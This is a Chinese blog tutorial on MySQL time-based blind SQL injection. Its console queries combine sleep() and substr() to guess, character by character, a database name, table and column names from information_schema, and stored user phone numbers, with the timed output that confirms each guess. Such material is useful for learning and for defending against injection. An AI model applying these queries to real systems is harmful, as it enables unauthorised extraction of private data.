zoukankan      html  css  js  c++  java

  • mysql基于“时间”的盲注

    无需页面报错,根据页面响应时间做判断!

    mysql基于时间的盲注
======================================================================================================================================================================
*	猜解库名
	-	下面是猜解正确
	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);                                                                             
		+----------+
		| sleep(1) |
		+----------+
		|        0 |
		+----------+
		1 row in set (1.00 sec)

	-	下面是猜解错误
	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);
		Empty set (0.00 sec)


*	猜解表名
	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a  where substr(a_tn, 1, 1)='f';
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)

	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a  where substr(a_tn, 1, 1)='x';
			Empty set (0.00 sec)


*	猜解字段名
	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a  where substr(a_cn, 1, 1)='i';
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.01 sec)

	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a  where substr(a_cn, 2, 1)='d';
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)


*	猜解字段值
	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)='1';
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)

	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='3';
			

	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='8';
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)

      
  • 相关阅读:
    vuesocket.io在单文件中使用(进入到单文件再发请求)
    el-tree设置默认展开及选中
    Vue项目中解决跨域问题
    echarts堆叠条形图计算总数()
    原生js实现点击目标区域外侧触发事件
    js构造树形菜单
    wangEditor服务器上传图片(Vue使用)
    webpack(6) 打包多页应用和sourcemap 使用
    NoSql相关
    Markdown
  • 原文地址:https://www.cnblogs.com/6ruce/p/5844955.html
Copyright © 2011-2022 走看看